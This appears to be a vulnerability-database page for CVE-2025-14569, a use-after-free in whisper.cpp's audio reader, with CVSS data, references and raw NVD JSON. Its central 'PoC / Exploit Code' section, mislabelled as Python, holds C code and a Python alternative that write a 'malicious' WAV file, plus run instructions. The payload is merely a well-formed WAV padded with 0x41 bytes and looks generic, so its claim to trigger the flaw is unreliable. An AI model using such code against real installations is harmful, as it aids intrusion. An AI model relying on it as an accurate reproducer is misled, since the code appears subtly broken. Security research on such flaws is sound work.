CVE-2025-14569

Description

A vulnerability was detected in ggml-org whisper.cpp up to 1.8.2. Affected is the function read_audio_data of the file /whisper.cpp/examples/common-whisper.cpp. The manipulation results in use after free. The attack requires a local approach. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

whisper.cpp <= 1.8.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * CVE-2025-14569 PoC - whisper.cpp use_after_free in read_audio_data
 * Author: Security Researcher
 * Description: Generates a malicious audio file to trigger use after free
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Create a malicious WAV file that triggers use after free
void create_malicious_audio(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        fprintf(stderr, "Failed to create file\n");
        return;
    }
    
    // WAV header
    char riff[4] = {'R', 'I', 'F', 'F'};
    fwrite(riff, 1, 4, fp);
    
    int file_size = 36 + 44; // header + malicious data
    fwrite(&file_size, 4, 1, fp);
    
    char wave[8] = {'W', 'A', 'V', 'E', 'f', 'm', 't', ' '};
    fwrite(wave, 1, 8, fp);
    
    // fmt chunk
    int fmt_size = 16;
    fwrite(&fmt_size, 4, 1, fp);
    short audio_format = 1; // PCM
    fwrite(&audio_format, 2, 1, fp);
    short num_channels = 1;
    fwrite(&num_channels, 2, 1, fp);
    int sample_rate = 16000;
    fwrite(&sample_rate, 4, 1, fp);
    int byte_rate = 32000;
    fwrite(&byte_rate, 4, 1, fp);
    short block_align = 2;
    fwrite(&block_align, 2, 1, fp);
    short bits_per_sample = 16;
    fwrite(&bits_per_sample, 2, 1, fp);
    
    // data chunk
    char data[4] = {'d', 'a', 't', 'a'};
    fwrite(data, 1, 4, fp);
    int data_size = 44;
    fwrite(&data_size, 4, 1, fp);
    
    // Malicious payload to trigger use after free
    unsigned char payload[44] = {0};
    memset(payload, 0x41, 44); // Fill with pattern
    fwrite(payload, 1, 44, fp);
    
    fclose(fp);
    printf("Malicious audio file created: %s\n", filename);
}

int main() {
    const char* malicious_file = "malicious_audio.wav";
    create_malicious_audio(malicious_file);
    
    printf("\nTo trigger the vulnerability:\n");
    printf("1. Compile whisper.cpp with the vulnerable code\n");
    printf("2. Run: ./main -f %s\n", malicious_file);
    printf("3. Observe use after free behavior\n");
    
    return 0;
}

// Alternative Python PoC
/*
import struct

def create_poc_wav(filename):
    with open(filename, 'wb') as f:
        # RIFF header
        f.write(b'RIFF')
        f.write(struct.pack('<I', 36 + 100))  # File size
        f.write(b'WAVE')
        
        # fmt chunk
        f.write(b'fmt ')
        f.write(struct.pack('<I', 16))  # Chunk size
        f.write(struct.pack('<H', 1))   # Audio format (PCM)
        f.write(struct.pack('<H', 1))   # Num channels
        f.write(struct.pack('<I', 16000))  # Sample rate
        f.write(struct.pack('<I', 32000))  # Byte rate
        f.write(struct.pack('<H', 2))   # Block align
        f.write(struct.pack('<H', 16))  # Bits per sample
        
        # data chunk - crafted to trigger UAF
        f.write(b'data')
        f.write(struct.pack('<I', 100))
        f.write(b'\x41' * 100)  # Pattern data

create_poc_wav('poc.wav')
print('PoC file created: poc.wav')
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14569
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14569
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14569/
[4] VulDB https://vuldb.com/cve/CVE-2025-14569
[5] https://github.com/ggml-org/whisper.cpp/issues/3501
[6] https://github.com/oneafter/InvalidFree/blob/main/repro
[7] https://vuldb.com/?ctiid.336193
[8] https://vuldb.com/?id.336193
[9] https://vuldb.com/?submit.703886

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14569", "sourceIdentifier": "[email protected]", "published": "2025-12-12T19:16:01.610", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in ggml-org whisper.cpp up to 1.8.2. Affected is the function read_audio_data of the file /whisper.cpp/examples/common-whisper.cpp. The manipulation results in use after free. The attack requires a local approach. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.1, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-416"}]}], "references": [{"url": "https://github.com/ggml-org/whisper.cpp/issues/3501", "source": "[email protected]"}, {"url": "https://github.com/oneafter/InvalidFree/blob/main/repro", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336193", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336193", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.703886", "source": "[email protected]"}]}}